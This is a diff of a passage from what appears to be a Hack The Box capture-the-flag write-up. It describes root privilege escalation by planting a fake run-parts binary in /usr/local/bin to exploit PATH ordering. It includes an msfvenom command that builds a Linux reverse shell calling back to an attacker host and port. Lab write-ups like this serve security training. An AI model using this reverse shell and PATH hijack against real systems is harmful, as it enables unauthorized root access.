slemire/slemire.github.io/_posts/2019-10-12-htb-writeup-writeup.md

 ![](/assets/images/htb-writeup-writeup/8.png)

+> run-parts runs all the executable files named within constraints described below, found in directory  directory.
+Other files and directories are silently ignored.

+I can't make run-parts run arbitrary binaries since I can't write `/etc/update-motd.d/` but because the program is run without the full path I can write my own `run-parts` binary to `/usr/local/bin` or `/usr/local/sbin` and it will be executed instead of the real one because the directory is located in front in the PATH variable definition.

-This is potential target for hijacking, first I will generate a reverse shell payload with msfvenom:
+For the malicious binary, I use a standard linux reverse shell payload generated with Metasploit:
 ```
 # msfvenom -p linux/x64/shell_reverse_tcp -f elf -o shell LHOST=10.10.14.7 LPORT=4444
 chmod +x ./shell
 ```

-Then I'll just upload the file to `/usr/local/bin/run-parts` and SSH in to trigger a callback
+I just need to upload the file to `/usr/local/bin/run-parts` and SSH in to trigger a callback and get root privileges.

 ![](/assets/images/htb-writeup-writeup/9.png)